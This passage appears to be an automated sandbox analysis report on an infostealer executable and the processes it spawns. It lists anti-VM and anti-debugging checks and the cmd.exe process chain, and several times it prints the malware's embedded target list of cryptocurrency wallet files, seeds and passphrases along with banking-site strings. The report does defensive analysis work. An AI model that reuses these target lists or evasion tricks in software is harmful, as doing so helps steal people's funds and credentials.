              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: E89hSGjVrv.exe, 00000000.00000002.2590019564.0000000000F21000.00000040.00000001.01000000.00000003.sdmp, DocumentsCAFHDBGHJK.exe, 00000014.00000002.2614020386.0000000001076000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000015.00000002.2640294900.00000000004C6000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000016.00000002.2640580036.00000000004C6000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000018.00000002.3299882215.00000000004C6000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: GIJJKKJJ.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: GIJJKKJJ.0.drBinary or memory string: discord.comVMware20,11696428655f
              Source: GIJJKKJJ.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: GIJJKKJJ.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: GIJJKKJJ.0.drBinary or memory string: global block list test formVMware20,11696428655
              Source: GIJJKKJJ.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWhud
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001641000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000018.00000002.3301990970.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000018.00000002.3301990970.0000000000C28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: GIJJKKJJ.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: GIJJKKJJ.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: GIJJKKJJ.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: GIJJKKJJ.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: GIJJKKJJ.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: GIJJKKJJ.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: GIJJKKJJ.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: GIJJKKJJ.0.drBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: GIJJKKJJ.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: GIJJKKJJ.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: GIJJKKJJ.0.drBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: GIJJKKJJ.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: GIJJKKJJ.0.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: GIJJKKJJ.0.drBinary or memory string: AMC password management pageVMware20,11696428655
              Source: GIJJKKJJ.0.drBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: GIJJKKJJ.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: GIJJKKJJ.0.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: GIJJKKJJ.0.drBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: DocumentsCAFHDBGHJK.exe, 00000014.00000002.2615879657.00000000019D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: GIJJKKJJ.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: GIJJKKJJ.0.drBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: GIJJKKJJ.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.00000000015CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: GIJJKKJJ.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001641000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW q
              Source: GIJJKKJJ.0.drBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: E89hSGjVrv.exe, 00000000.00000002.2590019564.0000000000F21000.00000040.00000001.01000000.00000003.sdmp, DocumentsCAFHDBGHJK.exe, 00000014.00000002.2614020386.0000000001076000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000015.00000002.2640294900.00000000004C6000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000016.00000002.2640580036.00000000004C6000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000018.00000002.3299882215.00000000004C6000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: GIJJKKJJ.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: GIJJKKJJ.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeThread information set: HideFromDebugger
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebugger
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebugger
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebugger
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: NTICE
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: SICE
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeProcess queried: DebugPort
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeProcess queried: DebugPort
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: E89hSGjVrv.exe PID: 5480, type: MEMORYSTR
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsCAFHDBGHJK.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\DocumentsCAFHDBGHJK.exe "C:\Users\user\DocumentsCAFHDBGHJK.exe"
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
              Source: E89hSGjVrv.exe, 00000000.00000002.2590019564.0000000000F21000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: +N;Program Manager
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000018.00000003.3216524744.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.2599736204.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2640421904.00000000002D1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2613893596.0000000000E81000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.2640022195.00000000002D1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.3299451123.00000000002D1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000003.2573401397.0000000005660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000003.2599153085.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2073713588.0000000005520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2593879213.00000000015EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2588765991.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: E89hSGjVrv.exe PID: 5480, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: Process Memory Space: E89hSGjVrv.exe PID: 5480, type: MEMORYSTR
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local 